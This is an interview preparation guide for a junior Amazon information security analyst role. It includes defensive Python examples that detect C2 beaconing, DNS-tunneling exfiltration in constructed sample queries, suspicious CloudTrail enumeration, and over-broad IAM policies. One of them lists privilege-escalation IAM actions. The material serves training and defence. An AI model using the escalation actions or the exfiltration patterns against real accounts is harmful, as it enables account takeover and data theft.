Amazon Information Security Analyst (Junior Level) Interview Preparation Guide
Amazon's interview process for junior-level Information Security Analyst roles typically consists of a recruiter screening phase followed by phone technical interviews and onsite interviews. The process emphasizes both technical security knowledge and Amazon's Leadership Principles. Expect scenario-based incident response questions, hands-on SIEM analysis, AWS security fundamentals, and behavioral questions aligned with Amazon's culture. The total process usually spans 4-6 weeks from initial recruiter contact to offer decision.
Interview Rounds
Recruiter Screening
What to Expect
This initial call with a technical recruiter confirms your background, motivation, and technical baseline. The recruiter will discuss your experience with security tools, familiarity with AWS, and interest in the role. They may ask quick technical screeners to verify basic security knowledge. This round is primarily about fit and moving you through the pipeline. For a junior level, the recruiter will focus on verifying your hands-on experience with SIEM tools, knowledge of common security concepts, and ability to articulate your security journey. Be prepared to discuss your current role, specific security projects you've worked on, and why Amazon appeals to you.
Tips & Advice
Be authentic and concise. Have a clear 2-3 minute summary of your security background ready. Mention specific tools you've used (Splunk, QRadar, or others) and concrete security projects. Ask thoughtful questions about the team, their security challenges, and growth opportunities. For junior level, emphasize your eagerness to deepen your security expertise and learn from experienced team members. Research Amazon's security posture and mention any relevant details to show genuine interest. Have your availability clearly stated for phone screens.
Focus Topics
Handling the Unexpected Technical Question
The recruiter may ask a quick technical question like 'What's the difference between a false positive and false negative in security monitoring?' or 'What is a CVSS score?' Have answers ready but don't overcomplicate.
AWS Security Awareness
Demonstrate basic familiarity with AWS services and security concepts such as IAM, security groups, VPCs, and EC2. You don't need deep expertise yet, but show awareness of cloud security considerations.
Questions to Ask the Recruiter
Prepare 3-4 thoughtful questions about the team's security focus, current challenges, tools used, and growth path for junior analysts. Avoid questions about salary or benefits at this stage.
Basic Security Tool Knowledge
Be ready to discuss your experience with SIEM platforms (Splunk, QRadar), AWS-native detection services (Amazon GuardDuty for threat findings, Amazon Macie for sensitive-data discovery in S3; neither is a SIEM, but both feed one), vulnerability management tools, or intrusion detection systems. Mention specific queries or use cases you've handled.
Motivation for Information Security and Amazon
Explain why you're interested in security as a career, what aspects of incident response or threat detection excite you, and why you want to work for Amazon specifically. Connect this to Amazon's scale and security requirements.
Your Security Background and Experience
Articulate your professional journey in security, specific tools you've used (SIEM, vulnerability scanners, IDS/IPS), and key accomplishments. Focus on hands-on experience with security monitoring and incident response.
Technical Phone Screen 1: SIEM and Incident Response Basics
What to Expect
This 45-60 minute technical phone screen assesses your foundational knowledge of SIEM tools, log analysis, and incident response methodologies. You'll be given a realistic security scenario involving suspicious network activity or a potential breach, and asked to walk through your investigation approach. The interviewer will evaluate your ability to analyze alerts, ask clarifying questions, and follow a systematic process. For a junior level, the expectation is competency in basic SIEM queries, understanding of network protocols (TCP/IP, DNS), and familiarity with incident response frameworks like NIST. You're expected to think through problems logically and ask for help when needed, not to know every answer immediately.
Tips & Advice
Walk through your thought process out loud rather than jumping to conclusions. When presented with a SIEM alert, systematically identify: source IP, destination IP, port, protocol, data volume, and time pattern. Ask clarifying questions ('What is the baseline activity for this user?' 'Are there any known threat indicators?'). For a junior level, it's perfectly acceptable to say 'I haven't seen that specific tool, but here's how I'd approach it' and describe your methodology. Practice explaining technical concepts in simple terms: you'll need to communicate with non-technical stakeholders. Reference the NIST SP 800-61 incident response lifecycle (Preparation; Detection and Analysis; Containment, Eradication and Recovery; Post-Incident Activity) even if you don't use the exact names. If you hit a knowledge gap, stay calm and discuss how you'd research the answer.
Focus Topics
Log Analysis and Query Construction
Ability to construct basic SIEM queries (Splunk, QRadar, or similar) to investigate hypotheses. Understanding of filtering by time, source, destination, user, process, and combining conditions. Practice articulating queries even if you haven't used the specific tool.
Phishing and Endpoint Incident Response Scenarios
Walk through a phishing incident scenario from email alert through containment and remediation: identifying malicious attachments, blocking sender domains, checking for user compromise, resetting credentials, documenting findings.
Common Attack Vectors and Indicators of Compromise (IOCs)
Recognition of common attack patterns: phishing, malware command-and-control (C2) beaconing, DNS tunneling, lateral movement, data exfiltration. Understanding what IOCs to look for: suspicious domains, known malicious IPs, unusual port combinations.
SIEM Alert Triage and Investigation Methodology
Systematic approach to investigating a SIEM alert: identify source and destination IPs, ports, protocols, baseline comparison, check for lateral movement, correlate with endpoint data, cross-reference threat intelligence, and document findings in a timeline.
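The triage steps listed above (source, destination, port, protocol, volume, time pattern, baseline comparison) and the IOC patterns from the previous topic (C2 beaconing, DNS tunneling, exfiltration volume), run over a handful of log lines as an added Python example that is not part of the original guide. It parses the lines, summarizes each (src, dst, port, proto) flow, flags beacon-like regularity in connection timing, flags DNS queries whose leftmost label is unusually long or high-entropy, and compares per-host byte volume against a baseline. The log format, the traffic, and the baseline numbers are all constructed for the example; the thresholds are assumptions to tune against real data.

```python
import math
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed firewall/DNS log lines in a simple key=value export format (not real traffic).
SAMPLE_LOGS = """\
2024-05-01T10:00:00Z fw src=10.0.1.15 dst=203.0.113.9 dport=443 proto=tcp bytes=1200
2024-05-01T10:01:00Z fw src=10.0.1.15 dst=203.0.113.9 dport=443 proto=tcp bytes=1180
2024-05-01T10:02:00Z fw src=10.0.1.15 dst=203.0.113.9 dport=443 proto=tcp bytes=1210
2024-05-01T10:03:00Z fw src=10.0.1.15 dst=203.0.113.9 dport=443 proto=tcp bytes=1195
2024-05-01T10:04:00Z fw src=10.0.1.15 dst=203.0.113.9 dport=443 proto=tcp bytes=1205
2024-05-01T10:00:12Z fw src=10.0.1.22 dst=198.51.100.4 dport=443 proto=tcp bytes=54000
2024-05-01T10:07:41Z fw src=10.0.1.22 dst=198.51.100.4 dport=443 proto=tcp bytes=91000
2024-05-01T10:31:05Z fw src=10.0.1.22 dst=198.51.100.4 dport=443 proto=tcp bytes=23000
2024-05-01T10:05:30Z dns src=10.0.1.40 query=mail.example.com
2024-05-01T10:05:31Z dns src=10.0.1.40 query=aGVsbG8gd29ybGQgdGhpcyBpcyBleGZpbA.t.example.net
2024-05-01T10:05:32Z dns src=10.0.1.40 query=c2VjcmV0IGRhdGEgY2h1bmsgdHdv.t.example.net
2024-05-01T10:10:00Z fw src=10.0.1.30 dst=10.0.2.5 dport=445 proto=tcp bytes=800000
"""

# Constructed per-host baseline: bytes a host normally sends in a comparable window (assumption).
BASELINE_BYTES = {"10.0.1.15": 20000, "10.0.1.22": 150000, "10.0.1.30": 50000}


def parse_line(line):
    """Parse '<timestamp> <source> key=value ...' into a dict with a datetime 'ts'."""
    ts, source, *kvs = line.split()
    rec = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "source": source}
    for kv in kvs:
        key, _, value = kv.partition("=")
        rec[key] = value
    return rec


def parse_logs(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def flow_summary(records):
    """Group firewall events per (src, dst, dport, proto): event count, total bytes, timestamps."""
    flows = defaultdict(lambda: {"count": 0, "bytes": 0, "times": []})
    for r in records:
        if r["source"] != "fw":
            continue
        f = flows[(r["src"], r["dst"], r["dport"], r["proto"])]
        f["count"] += 1
        f["bytes"] += int(r["bytes"])
        f["times"].append(r["ts"])
    return flows


def is_beacon(times, min_events=4, max_jitter_ratio=0.1):
    """Beacon heuristic: at least min_events whose inter-arrival gaps barely vary (stdev/mean)."""
    if len(times) < min_events:
        return False
    ordered = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
    mean = statistics.mean(gaps)
    if mean == 0:
        return False
    return statistics.pstdev(gaps) / mean <= max_jitter_ratio


def shannon_entropy(s):
    """Bits per character; English labels sit around 2-3, base64-like labels above 3.5."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_dns(records, max_label_len=30, min_entropy=3.5):
    """DNS tunneling heuristic: a very long or high-entropy leftmost label is data, not a hostname."""
    hits = []
    for r in records:
        if r["source"] != "dns":
            continue
        label = r["query"].split(".")[0]
        if len(label) > max_label_len or shannon_entropy(label) >= min_entropy:
            hits.append((r["src"], r["query"]))
    return hits


def volume_outliers(flows, baseline, factor=3.0):
    """Hosts that sent more than factor x their baseline; hosts with no baseline at all are flagged."""
    per_host = defaultdict(int)
    for (src, _, _, _), f in flows.items():
        per_host[src] += f["bytes"]
    return {h: b for h, b in per_host.items() if b > factor * baseline.get(h, 0)}


def triage(text):
    """Run all three checks over a log export and return what an analyst should look at first."""
    records = parse_logs(text)
    flows = flow_summary(records)
    return {
        "beacons": [key for key, f in flows.items() if is_beacon(f["times"])],
        "dns_tunnel_candidates": suspicious_dns(records),
        "volume_outliers": volume_outliers(flows, BASELINE_BYTES),
    }


if __name__ == "__main__":
    for name, value in triage(SAMPLE_LOGS).items():
        print(name, value)
```

On the constructed data the host 10.0.1.15 beacons to 203.0.113.9 every 60 seconds, both t.example.net queries are flagged (one by label length, the other by entropy even though it is under the length cut-off), and 10.0.1.30 pushes 800 KB over SMB against a 50 KB baseline; the 10.0.1.22 traffic is large but irregular and within baseline, which is exactly the kind of finding you would describe as "nothing yet, keep watching".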
NIST Incident Response Framework
Know the NIST SP 800-61 incident response lifecycle: Preparation; Detection and Analysis; Containment, Eradication and Recovery; Post-Incident Activity. (The NIST Cybersecurity Framework is a different document; its functions are Identify, Protect, Detect, Respond, Recover.) Be able to map incident response actions to each phase. Understand containment strategies (blocking IPs, disabling accounts) and remediation steps.
TCP/IP Networking Fundamentals for Security
Understanding of TCP/IP stack, common protocols (HTTP, HTTPS, DNS, FTP), ports (80, 443, 22, 53), and what suspicious network behavior looks like. Ability to read and interpret basic network logs.
Technical Phone Screen 2: AWS Security and Vulnerability Management
What to Expect
This 45-60 minute technical phone screen focuses on cloud security concepts, AWS services, and vulnerability management. You'll be asked about AWS security architecture, the shared responsibility model, IAM configurations, and how to identify and prioritize security vulnerabilities. Questions may include scenario-based discussions like 'How would you investigate an excessive API call pattern in CloudTrail?' or 'What security concerns would you have with this IAM policy?' For a junior level, expect foundational AWS knowledge and ability to reason through security implications. You're not expected to be an AWS expert, but understanding core security concepts like identity and access management, network isolation, and encryption is important.
Tips & Advice
Familiarize yourself with AWS documentation on the shared responsibility model. Understand the difference between what AWS secures ('of' the cloud: infrastructure, hypervisor) versus what you secure ('in' the cloud: IAM, application security, data encryption). When reviewing IAM policies or security configurations, ask yourself: 'Is this following least-privilege principles? Are there overly broad permissions? What's the business justification?' For a junior level, it's acceptable to not know AWS deeply—focus on explaining your security reasoning and how you'd approach learning AWS-specific tools. Practice articulating vulnerability prioritization using frameworks like CVSS or risk-based prioritization. Reference AWS services where relevant (GuardDuty, Macie, Systems Manager), but don't claim expertise if you haven't used them.
Focus Topics
Container and Application Security in AWS
Basic understanding of container security concerns (image vulnerabilities, privilege escalation, runtime threats), secrets management (AWS Secrets Manager vs. hardcoding credentials), and data encryption at rest and in transit.
AWS CloudTrail and Logging for Security
Understanding of CloudTrail logs for audit and compliance, recognizing suspicious API activity, and using logs for incident investigation. Familiarity with CloudWatch and basic log analysis.
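The phone-screen question 'How would you investigate an excessive API call pattern in CloudTrail?' worked as an added Python example (not from the guide): it takes CloudTrail-style records, groups them by calling principal, and flags principals whose activity looks like enumeration or abuse of a leaked key: a high AccessDenied rate, calls spread across many services, a burst of calls in a short window, and more than one source IP. The records use the real CloudTrail field names (eventTime, eventName, eventSource, userIdentity.arn, sourceIPAddress, errorCode) but every value is constructed, and the thresholds are assumptions to tune against the account's normal activity.

```python
from collections import Counter, defaultdict
from datetime import datetime


def record(event_time, event_name, event_source, arn, source_ip, error_code=None):
    """Build a minimal CloudTrail-style record (real field names, constructed values)."""
    r = {"eventTime": event_time, "eventName": event_name, "eventSource": event_source,
         "userIdentity": {"type": "IAMUser", "arn": arn}, "sourceIPAddress": source_ip}
    if error_code:
        r["errorCode"] = error_code
    return r


SUSPECT = "arn:aws:iam::123456789012:user/ci-deploy"   # constructed principal
NORMAL = "arn:aws:iam::123456789012:user/alice"        # constructed principal

# Constructed trail: ci-deploy's key suddenly enumerates many services from a new IP and is mostly denied.
ENUMERATION = [("ListUsers", "iam.amazonaws.com"), ("ListRoles", "iam.amazonaws.com"),
               ("DescribeInstances", "ec2.amazonaws.com"), ("ListSecrets", "secretsmanager.amazonaws.com"),
               ("GetSecretValue", "secretsmanager.amazonaws.com"), ("ListFunctions", "lambda.amazonaws.com"),
               ("DescribeDBInstances", "rds.amazonaws.com"), ("ListAccessKeys", "iam.amazonaws.com")]
RECORDS = (
    [record(f"2024-05-01T12:00:{i:02d}Z", name, svc, SUSPECT, "198.51.100.77", "AccessDenied")
     for i, (name, svc) in enumerate(ENUMERATION)]
    + [record("2024-05-01T12:00:09Z", "GetCallerIdentity", "sts.amazonaws.com", SUSPECT, "198.51.100.77"),
       record("2024-05-01T12:00:10Z", "ListBuckets", "s3.amazonaws.com", SUSPECT, "198.51.100.77"),
       record("2024-05-01T11:58:00Z", "PutObject", "s3.amazonaws.com", SUSPECT, "10.0.0.5"),
       record("2024-05-01T12:03:00Z", "GetObject", "s3.amazonaws.com", NORMAL, "10.0.0.9"),
       record("2024-05-01T12:04:00Z", "GetObject", "s3.amazonaws.com", NORMAL, "10.0.0.9")]
)


def _ts(r):
    return datetime.strptime(r["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def max_calls_in_window(records, window_seconds):
    """Largest number of calls that fall inside any sliding window of window_seconds."""
    times = sorted(_ts(r) for r in records)
    best, j = 0, 0
    for i in range(len(times)):
        while (times[i] - times[j]).total_seconds() > window_seconds:
            j += 1
        best = max(best, i - j + 1)
    return best


def profile_principals(records, window_seconds=60, burst_threshold=5, max_error_rate=0.5, min_services=4):
    """Summarize each principal's API activity and list the reasons it deserves a closer look."""
    by_arn = defaultdict(list)
    for r in records:
        by_arn[r["userIdentity"]["arn"]].append(r)
    findings = {}
    for arn, rs in by_arn.items():
        errors = sum(1 for r in rs if "errorCode" in r)
        error_rate = errors / len(rs)
        services = Counter(r["eventSource"] for r in rs)
        ips = Counter(r["sourceIPAddress"] for r in rs)
        peak = max_calls_in_window(rs, window_seconds)
        reasons = []
        if len(rs) >= burst_threshold and error_rate > max_error_rate:
            reasons.append(f"AccessDenied on {errors}/{len(rs)} calls (probing permissions)")
        if len(services) >= min_services:
            reasons.append(f"touched {len(services)} services (enumeration)")
        if peak >= burst_threshold:
            reasons.append(f"{peak} calls within {window_seconds}s (scripted activity)")
        if len(ips) > 1:
            reasons.append(f"{len(ips)} distinct source IPs: {sorted(ips)} (compare with the usual addresses)")
        if reasons:
            findings[arn] = {"calls": len(rs), "error_rate": round(error_rate, 3), "peak_calls": peak,
                             "services": sorted(services), "source_ips": dict(ips), "reasons": reasons}
    return findings


if __name__ == "__main__":
    for arn, info in profile_principals(RECORDS).items():
        print(arn)
        for reason in info["reasons"]:
            print("  -", reason)
```

The next steps an interviewer will expect you to name: confirm whether 198.51.100.77 belongs to the CI system, check the principal's access keys and when they were last rotated, and if the key is compromised deactivate it (`aws iam update-access-key --status Inactive`) before rotating, then look at what the successful calls (ListBuckets here) actually returned.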
Vulnerability Assessment and Prioritization
Understanding of vulnerability management lifecycle: discovery, assessment, prioritization, remediation, and verification. Familiarity with CVSS scores, risk-based prioritization, and how to communicate risk to stakeholders.
Network Security in AWS: VPCs, Security Groups, and Network Policies
Understanding VPC architecture, security groups as firewalls, network ACLs, and how to segment traffic for security. Ability to identify overly permissive security group rules.
AWS Shared Responsibility Model
Clear understanding of what AWS manages (infrastructure, physical security, hypervisor, networking hardware) versus customer responsibilities (IAM, data encryption, application security, OS patching, security groups). Ability to apply this model to specific scenarios.
AWS IAM Best Practices and Policy Analysis
Understanding of IAM roles, policies, least-privilege principles, MFA, and service accounts. Ability to identify overly permissive policies or security risks in IAM configurations. Familiarity with concepts like root account protection and credential rotation.
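The IAM review questions from the tips ('Is this following least privilege? Are there overly broad permissions?') applied to a policy document, as an added Python example that is not from the guide. It walks the Allow statements of an IAM policy and reports wildcard actions, wildcard resources, privilege-escalation-capable actions granted on every resource, and unconditioned wildcard grants, then checks what a given principal could do with the policy. The weak policy and the tightened version of it are constructed, and the list of escalation actions is a short illustrative subset, not a complete one.

```python
import fnmatch
import json

# Actions that let a principal grant itself more access; illustrative subset (assumption, not exhaustive).
ESCALATION_ACTIONS = [
    "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion", "iam:AttachUserPolicy",
    "iam:AttachRolePolicy", "iam:PutUserPolicy", "iam:PutRolePolicy", "iam:CreateAccessKey",
    "iam:PassRole", "sts:AssumeRole",
]

# Constructed 'before' policy: the kind of thing a deploy pipeline gets when nobody scopes it.
WEAK_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "DeployApp", "Effect": "Allow", "Action": "*", "Resource": "*"},
    {"Sid": "ReadLogs", "Effect": "Allow", "Action": ["logs:Get*", "logs:Describe*"], "Resource": "*"}
  ]
}""")

# Constructed 'after' policy: same two jobs, scoped to explicit actions, ARNs and conditions.
HARDENED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "DeployApp", "Effect": "Allow",
     "Action": ["s3:PutObject", "s3:GetObject"],
     "Resource": "arn:aws:s3:::example-deploy-bucket/app/*",
     "Condition": {"Bool": {"aws:SecureTransport": "true"}}},
    {"Sid": "ReadLogs", "Effect": "Allow",
     "Action": ["logs:GetLogEvents", "logs:DescribeLogStreams"],
     "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/app/*",
     "Condition": {"StringEquals": {"aws:PrincipalTag/team": "app"}}}
  ]
}""")


def as_list(value):
    return value if isinstance(value, list) else [value]


def action_matches(pattern, action):
    """IAM action patterns are case-insensitive and support * and ? wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def lint_policy(policy):
    """Return (sid, severity, issue, detail) tuples for Allow statements that break least privilege."""
    findings = []
    for st in policy["Statement"]:
        if st.get("Effect") != "Allow":
            continue
        sid = st.get("Sid", "<no Sid>")
        actions = as_list(st.get("Action", []))
        resources = as_list(st.get("Resource", []))
        if "NotAction" in st or "NotResource" in st:
            findings.append((sid, "high", "inverted Allow (NotAction/NotResource)", "grants everything not listed"))
        for a in actions:
            if a == "*" or a.endswith(":*"):
                findings.append((sid, "high", "full wildcard action", a))
            elif "*" in a or "?" in a:
                findings.append((sid, "low", "prefix wildcard action", a))
        if "*" in resources:
            findings.append((sid, "high", "wildcard resource", "*"))
        escalation = [e for e in ESCALATION_ACTIONS if any(action_matches(a, e) for a in actions)]
        if escalation and "*" in resources:
            findings.append((sid, "high", "privilege escalation path", ", ".join(escalation)))
        if "*" in resources and "Condition" not in st:
            findings.append((sid, "medium", "unconditional wildcard grant",
                             "no aws:SourceIp, aws:PrincipalTag or aws:MultiFactorAuthPresent condition limits it"))
    return findings


def policy_allows(policy, action, resource):
    """Allow-only check: does any Allow statement match this action on this resource?

    Deliberately ignores Deny statements, Conditions, NotAction, permission boundaries and SCPs;
    use the IAM policy simulator or IAM Access Analyzer for an authoritative answer."""
    for st in policy["Statement"]:
        if st.get("Effect") != "Allow" or "Action" not in st:
            continue
        if any(action_matches(a, action) for a in as_list(st["Action"])) and \
           any(fnmatch.fnmatchcase(resource, r) for r in as_list(st.get("Resource", []))):
            return True
    return False


if __name__ == "__main__":
    for f in lint_policy(WEAK_POLICY):
        print(f)
    print("hardened findings:", lint_policy(HARDENED_POLICY))
```

The escalation check is the one to talk about in the interview: `Action: "*"` on `Resource: "*"` is not just "too broad", it lets the holder of the deploy credentials mint new access keys or attach AdministratorAccess to themselves, which turns a leaked CI secret into full account compromise.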
Onsite Round 1: Security Operations and SIEM Deep Dive
What to Expect
This 60-minute onsite technical interview dives deeper into your hands-on experience with SIEM tools and daily security operations work. You'll likely be presented with a realistic SIEM dashboard showing multiple alerts and asked to triage, investigate, and make decisions about which incidents to escalate. The interviewer may ask you to walk through a past incident you've handled, explaining your methodology, tools used, decisions made, and outcomes. Expect questions about your experience with specific SIEM platforms, how you handle false positives, and how you communicate findings to the security team. For a junior level, the focus is on demonstrating competency with core tools and showing that you can work through ambiguity when faced with incomplete information.
Tips & Advice
Prepare 2-3 specific incident investigation examples from your current or previous role. Use the STAR format but emphasize the technical details: what tools did you use, what did the logs show, how did you determine it was or wasn't malicious, what was the impact, what did you learn? Be honest about limitations—'We didn't catch that because our detection rules didn't cover that technique' is better than making excuses. If asked about a tool you haven't used, say 'I've used [similar tool], here's how I'd approach learning [new tool].' Practice explaining why certain alerts are high priority versus low priority. Show that you understand the cost of false positives (alert fatigue, burnout, missing real incidents) and false negatives (missing actual attacks). For a junior level, it's expected that you'll ask questions when you encounter something unfamiliar.
Focus Topics
Communication of Security Findings and Risk
Ability to explain technical security findings clearly to non-technical stakeholders. Translating CVSS scores, attack techniques, and remediation steps into business language.
Hands-On Problem Solving: Analyzing Suspicious Activity
Given a set of logs or a simulated SIEM dashboard, investigate the activity step-by-step, ask clarifying questions, form hypotheses, and explain your conclusions. Show your reasoning process even if you don't reach a definitive answer.
Alert Triage, False Positive Management, and Tuning
Strategies for identifying false positives, tuning detection rules to reduce noise while maintaining coverage, and balancing alert volume with investigation capability. Understanding the cost of alert fatigue.
Correlation and Enrichment: Connecting the Dots
Ability to correlate multiple data sources (SIEM, endpoint telemetry, threat intelligence, DNS logs) to build a complete picture of an incident. Understanding how to enrich alerts with context.
SIEM Tool Hands-On Experience (Splunk, QRadar, or equivalent)
Practical experience with at least one major SIEM platform including alert configuration, query construction, dashboard creation, and investigation workflows. Ability to demonstrate proficiency even if interviewer uses different tool.
Real Incident Investigation Case Study
Detailed walkthrough of a specific security incident you investigated: initial alert, investigation steps, findings, decisions made, containment/remediation actions, and outcome. Quantify impact when possible.
Onsite Round 2: Security Frameworks, Compliance, and Threat Intelligence
What to Expect
This 60-minute onsite interview evaluates your understanding of security frameworks, compliance requirements, and threat intelligence. You'll discuss frameworks like MITRE ATT&CK, NIST Cybersecurity Framework, and OWASP Top 10, and how they apply to security operations. Questions may include: 'How would you map a detected attack technique to MITRE ATT&CK and use that for detection improvement?' or 'What compliance requirements are relevant to protecting customer data?' For a junior level, the expectation is familiarity with these frameworks and ability to apply them to real scenarios, not memorizing every detail. The interviewer is also assessing whether you understand the 'why' behind security controls and frameworks, not just following procedures.
Tips & Advice
Study the MITRE ATT&CK framework and pick 3-5 techniques relevant to your company or industry; be ready to discuss detection strategies for those. For NIST CSF, understand the core functions (Identify, Protect, Detect, Respond, Recover; CSF 2.0 adds Govern) and be able to map a business scenario to these. Review the current OWASP Top 10 and have examples of each category. When discussing compliance, focus on the practical implications: 'PCI DSS requires encryption of cardholder data because...' rather than just listing requirements. For a junior level, it's perfectly fine to say 'I'm less familiar with that specific framework, but here's how I'd approach learning it.' Prepare examples of how security controls map to business objectives.
Focus Topics
Detection Engineering and Coverage Gaps
Ability to evaluate whether your detection rules cover important attack techniques, identify gaps, and think through how to close them. Understanding the trade-off between detection coverage and false positive rates.
OWASP Top 10 and Application Security
Familiarity with the OWASP Top 10 categories (in the 2021 list: broken access control, cryptographic failures, injection, insecure design, security misconfiguration, vulnerable and outdated components, identification and authentication failures, software and data integrity failures, security logging and monitoring failures, and server-side request forgery; the 2017 list you may still see cited names some of these differently, for example 'sensitive data exposure' and 'XML external entities'), their impact, and how to identify and prevent them.
Compliance Requirements and Security Operations Impact
Basic awareness of compliance frameworks (SOC 2, GDPR, HIPAA, PCI DSS) and how they drive security monitoring, data protection, and incident response requirements. Understanding why these requirements exist.
Threat Intelligence Fundamentals and Indicators
Understanding types of threat intelligence (tactical IOCs like IPs/domains, strategic intelligence about threat actors), how to integrate threat intel into security operations, and how to evaluate source credibility.
NIST Cybersecurity Framework (CSF) for Operations
Understanding the core functions (Identify, Protect, Detect, Respond, Recover, with Govern added in CSF 2.0) and how security operations work across each function. Ability to map security activities to the framework.
MITRE ATT&CK Framework Application
Understanding the MITRE ATT&CK matrix structure (tactics and techniques), ability to identify attack techniques in incident investigations, and knowledge of how to use ATT&CK for detection engineering and gap analysis.
Onsite Round 3: Behavioral - Amazon Leadership Principles and Teamwork
What to Expect
This 45-60 minute onsite behavioral interview evaluates how you align with Amazon's Leadership Principles and how you work as a team member. You'll be asked behavioral questions focusing on examples of how you've demonstrated principles like 'Bias for Action,' 'Deliver Results,' 'Customer Obsession,' 'Learn and Be Curious,' and 'Think Big.' The interviewer uses the STAR method to evaluate your answers. For a junior-level role, emphasis is on demonstrating willingness to take initiative, ability to learn quickly, collaborative approach to security challenges, and how you handle ambiguity or failure. The interviewer is assessing your growth potential and cultural fit, not expecting you to be a seasoned leader.
Tips & Advice
Research Amazon's Leadership Principles and pick 2-3 that resonate most with your experience. Prepare specific STAR examples (Situation, Task, Action, Result) for each. For 'Bias for Action,' share a time you made a security decision quickly with incomplete information and adjusted as you learned more. For 'Learn and Be Curious,' discuss learning a new security tool or framework. For 'Deliver Results,' give an example of identifying and fixing a security issue that had real impact. Avoid generic answers; specific, detailed examples with numbers are more convincing. For a junior level, it's acceptable to show you learned from mistakes—'I made a false escalation, but here's what I learned'—because learning agility is valued. Prepare 5-6 strong stories and be ready to adapt them to different principles. Show that you're not just technically competent but also someone who cares about your team and Amazon's mission.
Focus Topics
Learning from Failure and Continuous Improvement
Examples of security incidents or projects that didn't go perfectly, what you learned, and how you improved. Ability to discuss mistakes without defensiveness.
Amazon Leadership Principle: Learn and Be Curious
Proactively learning new security tools, frameworks, or attack techniques. Examples of how you've developed security knowledge, taken on new responsibilities, or mentored others.
Amazon Leadership Principle: Customer Obsession
Thinking about how security impacts Amazon's customers and services. Examples of considering customer data protection, confidentiality, or service availability in your security work.
Collaboration and Teamwork in Security
Examples of working effectively with other security team members, collaborating across teams (DevOps, Engineering), and helping junior colleagues. Ability to communicate security findings constructively.
Amazon Leadership Principle: Bias for Action
Ability to make decisions and take action even with incomplete information, act quickly to address security threats, and adjust course based on new data. Example: Responding to a security alert before all analysis is complete.
Amazon Leadership Principle: Deliver Results
Commitment to delivering on security improvements, meeting deadlines for vulnerability remediation, and taking ownership of your work. Examples of security projects or improvements you've owned.
Onsite Round 4: Incident Response Deep Dive and Security Decision-Making
What to Expect
This 60-minute onsite technical interview focuses on comprehensive incident response scenarios and your ability to make security decisions under pressure. You'll be presented with complex incident scenarios (e.g., 'A user's account shows suspicious access from an unfamiliar location, and they're accessing sensitive data') and asked to walk through your complete response: initial assessment, investigation steps, containment decisions, stakeholder communication, and post-incident improvements. The interviewer probes your decision-making: 'Why did you choose to contain immediately rather than investigate further?' or 'How would you balance security with business continuity?' This round tests both technical knowledge and judgment. For junior level, the focus is on showing sound reasoning and following established incident response procedures, not on making perfect decisions without guidance.
Tips & Advice
When presented with an incident scenario, break it down methodically: (1) Clarify the facts: ask questions about what you observe, baselines, and affected systems; (2) Assess severity using a framework (CVSS, risk-based, or business impact); (3) Develop a hypothesis about what happened; (4) Outline investigation steps to test your hypothesis; (5) Describe containment actions (proportional to severity); (6) Discuss remediation and how to prevent recurrence. Be prepared to explain trade-offs: 'Immediately terminating the session might prevent data loss, but investigation would be harder' or 'Blocking the IP prevents future attacks but might impact legitimate services.' For a junior level, it's acceptable to say 'I'd escalate to my senior analyst or incident commander for this decision' when appropriate, but show you're thinking through the decision criteria. Practice describing incident response using NIST SP 800-61 terminology (detection and analysis; containment, eradication and recovery; post-incident activity). Show that you document incidents thoroughly and consider compliance implications (evidence preservation, notification requirements).
Focus Topics
Compliance and Legal Considerations in Incident Response
Understanding of notification requirements (GDPR, state breach laws, contractual obligations), evidence preservation, chain of custody, and communication with legal/compliance teams.
Post-Incident Analysis and Lessons Learned
Conducting root cause analysis, documenting incident timeline, identifying process improvements and new detection rules, communicating lessons learned to the team. Understanding how to prevent similar incidents.
Incident Response Scenarios: Phishing and Credential Compromise
Detailed walkthrough of phishing incident response including email investigation, user education, credential reset, lateral movement checking, and detection rule updates.
Incident Response Scenarios: Suspicious Data Access and Exfiltration
Investigating unusual data access patterns, determining if data was exfiltrated, containing the threat, notifying affected users/regulators, and preventing recurrence.
Incident Response Decision-Making Framework
Ability to assess incident severity, determine appropriate response level (alert vs. incident vs. major incident), and make containment/remediation decisions. Understanding trade-offs between investigation depth and response speed.
Containment Strategies for Different Threat Types
Knowledge of containment approaches for common incidents: compromised credentials (reset, monitor), malware (isolate, scan), unauthorized access (block, revoke), data exfiltration (block egress, monitor data flow). Understanding escalation and when to involve other teams.
Onsite Round 5: Technical Leadership and Security Program Thinking
What to Expect
This final 60-minute onsite interview evaluates your ability to think beyond individual incidents to broader security program considerations. You'll discuss topics like vulnerability management prioritization, building detection coverage, security tool evaluation, and communicating security initiatives to leadership. Questions might include: 'How would you approach building a vulnerability management program from scratch?' or 'Our detection rules flag 1,000 alerts per day but we can only investigate 50—how do we improve?' These questions assess whether you're developing strategic thinking and can contribute to security program improvements. For a junior level, the focus is on showing awareness of these broader challenges, asking intelligent questions, and demonstrating your willingness to contribute to program improvements, not on having solved these problems before.
Tips & Advice
Approach these questions by breaking down complex security challenges: (1) Understand the business context (what's Amazon trying to protect?); (2) Identify constraints (budget, team size, tool limitations); (3) Propose a phased approach (not everything at once); (4) Focus on high-impact improvements first; (5) Explain how you'd measure success. For example, on vulnerability management: 'We'd start by discovering all assets, assessing vulnerabilities with CVSS, prioritizing by risk to critical assets, and creating a remediation timeline.' For alert volume: 'We'd analyze which alerts are high-value vs. noise, tune detection rules, correlate alerts to reduce duplication, and build better baseline models.' For a junior level, it's expected that you'll ask clarifying questions ('What's our current tooling?', 'How many analysts do we have?') and acknowledge that you'd involve senior colleagues in final decisions. Show enthusiasm for security program improvements and demonstrate you're thinking about scalability and efficiency.
